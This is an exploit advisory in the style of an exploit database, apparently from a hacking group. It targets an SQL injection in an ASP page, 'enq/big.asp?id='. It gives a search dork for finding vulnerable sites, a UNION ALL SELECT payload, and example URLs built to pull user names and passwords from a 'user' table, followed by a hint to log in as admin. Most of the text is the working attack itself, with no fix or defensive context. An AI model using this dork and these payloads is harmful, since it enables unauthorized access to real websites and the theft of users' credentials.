*******************************************************************************
# Author : Ra3cH
# Price: N/A
# Title: (big.asp) SQL Injection Vulnerability
# Site : www.dz4all.com/cc
# Dork : inurl:enq/big.asp?id=
# Risk : High
*
**Vulnerable script: enq/big.asp?id= (SQL-injection)
* ---------------------------------------------------------
*
**http://server/[path]/enq/big.asp?id=[SQL Inject]
*
**Exploit:
*
**-999.9 UNION ALL SELECT null,null,null,null,null,null,null,null,null,null,null,null from user where 1=1
*
**Example:
*
**http://[site]/enq/big.asp?id=-999.9 UNION ALL SELECT null,null,user_pass,null,null,null,null,null,null,null,null from user where 1=1
**or
*
**http://[site]/enq/big.asp?id=-999.9 UNION ALL SELECT null,null,null,null,user_name,null,null,null,null,null,null,null from user where 1=1
**Admin Login->
*
**http://server/[path]/Use your intelligence
*
*""""""""""""""""""""
** Greetz to : ALLAH
** All Members of http://www.DZ4All.cOm/Cc
**And My BrOther AnGeL25dZ & yasMouh & ProToCoL & Mr.Benladen & T O X ! N £ & n2n &